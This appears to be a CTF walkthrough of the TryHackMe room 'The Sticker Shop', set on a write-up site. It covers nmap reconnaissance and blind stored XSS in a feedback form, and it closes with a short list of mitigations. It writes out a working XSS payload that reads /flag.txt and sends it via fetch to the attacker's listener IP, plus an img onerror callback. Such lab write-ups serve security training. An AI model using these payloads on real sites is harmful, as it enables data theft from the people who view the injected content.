✍️
Writeups and Walkthroughs
HomeGitHubPortfolio Twitter/X Medium Cont@ct
  • ✍️Writeups and Walkthroughs
  • THM
    • Simple CTF
    • RootMe
    • Eternal Blue
    • Vulnversity
    • Pickle Rick
    • Brooklyn Nine Nine
    • Kenobi
    • Bounty Hacker
    • Overpass
    • LazyAdmin
    • Ignite
    • Bolt
    • Agent Sudo
    • Anonymous
    • Startup
    • Wgel
    • Lian_Yu
    • Blog
    • ColdBox
    • H4cked
    • Smag Grotto
    • Ice
    • Blaster
    • The Sticker Shop
    • 🔟OWASP
      • 1️⃣Injection
    • Active Directory Basics
    • Attacktive Directory
    • Post-Exploitation Basics
  • HackTheBox
    • Active
    • Devel
    • Delivery
    • Analytics
    • Bashed
    • Valentine
    • Sau
    • Sunday
    • Cap
    • Bizness
    • Chemistry %
  • Vulnhub
    • Brainpain (BoF)
  • DockerLabs
    • Trust
    • Upload
    • Vacaciones
  • DVWA
    • Install and configure DVWA
    • Command Injection
    • CSRF
    • File Inclusion
    • SQL Injection
    • SQLi Blind
  • Mutillidae II
    • Install & configure OWASP Mutillidae II
    • SQLi
      • SQLi Login Bypass
      • Extracting Data
      • Finding Number of Columns
      • Pivoting with SQL injection
    • Command Injection
      • Extracting User Accounts
      • Web Shell
    • IDOR & File Inclusion
      • Edit Another User's Profile
      • Extracting User Accounts
      • Extracting User Accounts with Local File Inclusion
      • Web Shell with Remote File Inclusion (RFI)
    • XSS
      • XSS Reflected
      • XSS Stored
      • XSS DOM-Based
  • Secure Bank
    • Install & configure Secure Bank
    • -----
      • SQLi Login Bypass
      • Extracting Data
      • Finding Number of Columns
      • Pivoting with SQL injection
    • -----
      • Extracting User Accounts
      • Web Shell
  • PortSwigger - Web Security Academy
    • Burp Suite Config
    • Information Disclosure
      • Information disclosure vulnerabilities
      • Common sources of information disclosure
        • Information disclosure in error messages
        • Information disclosure on debug page
        • Source code disclosure via backup files
        • Authentication bypass via information disclosure
        • Information disclosure in version control history
    • Essential skills
      • Obfuscating attacks using encodings
        • SQL injection with filter bypass via XML encoding
      • Using Burp Scanner
      • Identifying unknown vulnerabilities
    • Server-side vulnerabilities
      • Path traversal
        • File path traversal, simple case
      • Access control
        • Unprotected admin functionality
        • Unprotected admin functionality with unpredictable URL
        • User role controlled by request parameter
        • User ID controlled by request parameter, with unpredictable user IDs
        • User ID controlled by request parameter with password disclosure
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
      • Server-side request forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end system
      • File upload vulnerabilities
        • Remote code execution via web shell upload
        • Web shell upload via Content-Type restriction bypass
      • OS Command Injection
        • OS command injection, simple case
      • SQL injection
        • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
        • SQL injection vulnerability allowing login bypass
    • JWT Attacks
      • Json Web Tokens (JWT)
      • Exploiting JWT
        • JWT authentication bypass via unverified signature
        • JWT authentication bypass via flawed signature verification
        • JWT authentication bypass via weak signing key
        • To-Do
          • JWT authentication bypass via jwk header injection - %
          • JWT authentication bypass via jku header injection - %
          • JWT authentication bypass via kid header path traversal - %
    • API Testing
      • API Testing
        • Exploiting an API endpoint using documentation
        • Finding and exploiting an unused API endpoint
        • Exploiting a mass assignment vulnerability
      • Server-side parameter pollution
        • Exploiting server-side parameter pollution in a query string
    • Deserialization Insecure
      • Serialization vs Deserialization
        • Lab
        • Lab
      • Java Insecure Deserialization
        • Lab
        • Lab
      • PHP Insecure Deserialization
        • Lab
        • Lab
  • HomeMade Labs
    • Active Directory
      • AD Lab Setup
      • AD Enumeration
      • SMB Common Attacks
    • Pivoting
      • Pivoting Theory
      • Pivoting Guidelines
      • Lab (3 Targets)
    • Buffer Overflow (BoF)
      • BoF Theory
      • Brainpain (BoF Lab)
Powered by GitBook
On this page
  • Task 1 - Deploy the machine
  • Task 2 - Reconnaissance
  • Task 3 - Find the flag.txt
  1. THM

The Sticker Shop

https://tryhackme.com/room/thestickershop

PreviousBlasterNextOWASP

Last updated 3 months ago

🔗 ​

Task 1 - Deploy the machine

🎯 Target IP: 10.10.73.89

Create a directory for machine on the Desktop and a directory containing the scans with nmap.

Task 2 - Reconnaissance

su
echo "10.10.73.89 tss.thm" >> /etc/hosts

mkdir thm/tss.thm
cd thm/tss.thm
mkdir {nmap,content,exploits,scripts}

# At the end of the room
# To clean up the last line from the /etc/hosts file
sed -i '$ d' /etc/hosts

I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.

ping -c 3 tss.thm
PING tss.thm (10.10.73.89) 56(84) bytes of data.
64 bytes from tss.thm (10.10.73.89): icmp_seq=1 ttl=63 time=65.0 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=2 ttl=63 time=61.9 ms
64 bytes from tss.thm (10.10.73.89): icmp_seq=3 ttl=63 time=62.3 ms

Sending these three ICMP packets, we see that the Time To Live (TTL) is ~64 secs. this indicates that the target is a *nix, while Windows systems usually have a TTL of 128 secs.

This guide does not provide a path and intermediate answers, but asks us directly for the flag.

Let's capture her right away with a curl curl -i http://tss.thm:8080/flag.txt

2 of spades! :D

Not worry, start to check information scanning open ports:

nmap --open -p0- -n -Pn -vvv --min-rate 5000 tss.thm -oG nmap/port_scan
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63
command
result

sudo

run as root

sC

run default scripts

sV

enumerate versions

A

aggressive mode

T4

run a bit faster

oN

output to file with nmap formatting

It looks like there are 2 open ports on the machine: 22 and 8080.

Now, we need to search which services are running on open ports:

nmap -p22,8080 -n -Pn -vvv -sCV --min-rate 5000 tss.thm -oN nmap/open_port
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDZ5yrbM4EUF9kvSfSmVTdRWGVeqTTpQpwFopgW7iFN3f/I3mBWiJpAGL8Q8rEs7n8ESeN0yRcr1lGSuUtRqk5Mwei9edFIAGFC0uEJMnO7EQl/3O8PAlTGeuIaEg+YItzpmXOIWfslh0oftoQNN0iWouJFj7DU5QtoiuwK9GIDwD54aaJ6QQHu16nYYk0fTmA2szzSy0nL0fG1I+ILOnVf1SEyDu5a+uHSKA4lERXWsJ6KDhEtxAuf1+uk8x33I4ERJQsGEZ/GbFJsPxbWhFgyvRE9cScm+YpeppPBMwbvicnEg+MZLuDfXAzYCsDvXPem8io/8QlqHXAyTb/hfw8twUiLuWRHPuHH6E4tq+cztlD/BsfydBn+72TEB7dZnRnWP4tAnI5au2KiPA1RA3ud3JNn7Ha7iU0AA5MK9gKhSv/S5tDyLhFbAcLm8ByWzdJ1R5F8NIlWG8C9VDgDuixmIQwsV4D7FthMTsDaM5PuJHr5GDOfT56Mn3fGxQT2W4k=
|   256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKVWb4NfXmP4f5RQIvXlrggi/9cDARgYazfJpJFlRhH/Ypg/QO6JQ0cj+BInTq4qjv9q5f1ksX0KLJxT2sc95WI=
|   256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHQ5WIN3vZO9KIDXb+PpV5yqA3SVieIqn8jSOGdjDHm1
8080/tcp open  http    syn-ack ttl 63 Werkzeug httpd 3.0.1 (Python 3.8.10)
|_http-title: Cat Sticker Shop
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The web server is configured on port 8080 and not on 80, let's go there!

Task 3 - Find the flag.txt

Proceeding to enumerate our website using a cmd tool: whatweb "http://tss.thm:8080"

We just know this info through nmap scan results, we'll investigate very well about "werkzeug 3.0 1 python 3.8 10", we will eventually check if it is vulnerable later.

TNow let's open the browser to view the web page (port 8080):

here, there're two products/sticker images that we can only see.

and see page source for checking information disclosure.

but we don't find precious info.

In the meantime I ran a 'directory enumeration' scan with gobuster, which unfortunately returned no results.

gobuster dir -u http://tss.thm:8080 -w /usr/share/wordlists/dirb/common.txt

Let's move to the second page: "Feedback":

Very good, a textarea where we can write and submit a feedback, it can be an injection point.

Testing the standard XSS payload: <script>alert("XSS")</script> we have no errors, but at the same time nothing is reflected:

let's analyze the thing better by capturing the http request with our dear Burp Suite proxy.

We can see that's a POST request and the following file formats are accepted in the form

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng

Since the possible XSS seems hidden, let's try to see if it allows us to connect to our attacker machine using the javascript method: fetch

Retrieve our attacker machine IP (10.21.31.235)

Go in listening mode with netcat on port 1339: nc -lvnp 1339

and execute into BurpSuite Repeater or directly into textarea this command:

<img src=x onerror="fetch('http://10.21.31.235:1339')"/>

and we receive the request, fantastic!

Based on this and remembering that the flag is in the path /flag.txt, we prepare a payload that allows us to extract the flag in the response:

<script>
fetch('http://tss.thm:8080/flag.txt') // Requests the flag file from the target server
  .then(response => response.text()) // Reads the response as text
  .then(data => {
    fetch('http://10.21.31.235:1339/?data=' + encodeURIComponent(data)) // Sends stolen data to attacker's machine
  })
</script>

Flag found!

Possible Mitigations
  • Content Security Policy (CSP): Block inline scripts and limit allowed domains for fetch requests.

  • Proper XSS filtering: Sanitize user inputs to prevent script injection.

  • Same-Origin Policy enforcement: Ensure sensitive files like flag.txt are not accessible from untrusted origins.

  • HttpOnly & Secure cookies: Prevent session hijacking through XSS attacks

🚩 Flag (flag.txt)

The Sticker Shop
https://tryhackme.com/room/thestickershop